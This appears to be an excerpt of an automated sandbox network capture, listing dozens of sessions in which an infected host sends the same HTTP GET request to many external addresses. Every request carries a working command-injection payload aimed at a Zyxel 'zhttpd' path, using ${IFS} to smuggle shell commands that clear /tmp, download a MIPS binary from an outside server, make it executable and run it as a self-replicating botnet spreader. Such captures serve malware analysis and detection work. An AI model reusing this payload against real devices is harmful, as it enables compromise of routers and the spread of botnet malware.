                                            Feb 2, 2024 06:21:08.546262980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3237192.168.2.1537296174.145.207.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546304941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3238192.168.2.1553050134.203.109.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546334982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3239192.168.2.155954040.199.214.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546401978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3240192.168.2.155173250.119.138.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546438932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3241192.168.2.153561851.127.8.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546484947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3242192.168.2.1557616191.36.164.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546505928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3243192.168.2.1537320123.23.242.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546539068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3244192.168.2.154636869.173.16.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546591997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3245192.168.2.154910652.252.212.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546639919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3246192.168.2.1548692159.159.81.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546674013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3247192.168.2.1535608209.107.250.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546694994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3248192.168.2.15411304.94.164.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546746016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3249192.168.2.1546224194.141.44.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546786070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3250192.168.2.1535876114.76.13.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546808004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3251192.168.2.1545940172.155.53.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546843052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3252192.168.2.15354788.252.69.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546875954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3253192.168.2.153753024.140.111.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546901941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3254192.168.2.1535828145.26.227.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546940088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3255192.168.2.1547346205.170.247.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546969891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3256192.168.2.1554160152.42.230.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547010899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3257192.168.2.1560378177.171.17.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547046900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3258192.168.2.1553812145.95.127.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547076941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3259192.168.2.1560250140.103.181.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547127962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3260192.168.2.153728692.4.94.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547154903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3261192.168.2.154666443.104.246.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547194004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3262192.168.2.153797250.0.26.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547245026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3263192.168.2.1559064177.4.39.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547292948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3264192.168.2.156049418.86.18.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547327042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3265192.168.2.1555414200.189.206.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547375917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3266192.168.2.155142489.37.120.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547421932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3267192.168.2.1540648175.219.116.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547435999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3268192.168.2.1546792179.39.219.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547477007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3269192.168.2.1548488212.1.193.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547533989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3270192.168.2.154569292.199.44.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547563076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3271192.168.2.1537876180.56.49.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547602892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3272192.168.2.154795634.159.76.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547637939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3273192.168.2.1541436209.148.12.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547667980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3274192.168.2.1544264136.184.54.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547699928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3275192.168.2.153635818.241.136.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547739029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3276192.168.2.1545796138.233.30.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547769070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3277192.168.2.1542284180.51.109.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547805071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3278192.168.2.1548180135.215.200.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547858000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3279192.168.2.15342001.239.48.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547887087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3280192.168.2.1551128222.140.26.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547930956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3281192.168.2.155459658.147.178.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.547986031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3282192.168.2.1558872166.7.196.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548012972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3283192.168.2.153631851.231.30.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548043013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3284192.168.2.1547592107.100.3.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548089981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3285192.168.2.154370043.66.76.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548152924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3286192.168.2.153654679.103.5.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548178911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3287192.168.2.1550294202.104.199.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548227072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3288192.168.2.1533550119.109.97.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548259020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3289192.168.2.154545635.136.30.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548299074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3290192.168.2.1537346173.18.191.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548338890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3291192.168.2.154518844.28.250.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548394918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3292192.168.2.1555552221.0.146.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548441887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3293192.168.2.154094012.77.229.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548491955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3294192.168.2.1554532106.14.221.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548518896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3295192.168.2.1550492209.154.168.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548554897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3296192.168.2.15404481.14.160.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548588037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3297192.168.2.154611299.121.171.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548648119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3298192.168.2.155642063.221.35.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548682928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3299192.168.2.1560204114.193.173.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548729897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3300192.168.2.1544374151.162.254.227443
                                            TimestampBytes transferredDirectionData
